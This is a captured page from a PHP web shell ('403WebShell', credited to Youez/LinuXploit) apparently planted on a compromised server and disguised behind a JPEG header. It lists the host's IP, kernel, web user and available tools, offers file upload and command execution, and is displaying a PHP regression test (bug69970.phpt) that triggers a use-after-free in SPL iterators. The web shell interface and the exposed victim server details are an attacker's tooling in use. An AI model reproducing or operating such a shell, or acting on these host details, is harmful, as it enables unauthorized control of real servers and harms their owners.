????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.149.230.234
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/spl/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/spl/tests/bug69970.phpt
--TEST--
Bug #69970 (Use-after-free vulnerability in spl_recursive_it_move_forward_ex())
--FILE--
<?php

$count = 10;

class RecursiveArrayIteratorIterator extends RecursiveIteratorIterator {
  function rewind() {
    echo "dummy\n";
  }
  function endChildren() {
	  global $count;
	  echo $this->getDepth();
	  if (--$count > 0) {
		  // Trigger use-after-free
		  parent::rewind();
	  }
  }
}
$arr = array("a", array("ba", array("bba", "bbb")));
$obj = new RecursiveArrayIterator($arr);
$rit = new RecursiveArrayIteratorIterator($obj);

foreach ($rit as $k => $v) {
  echo ($rit->getDepth()) . "$k=>$v\n";
}
?>
--EXPECT--
dummy
00=>a
00=>a
10=>ba
20=>bba
21=>bbb
21010=>ba
20=>bba
21=>bbb
21010=>ba
20=>bba
21=>bbb
21010=>ba
20=>bba
21=>bbb
21

Youez - 2016 - github.com/yon3zu
LinuXploit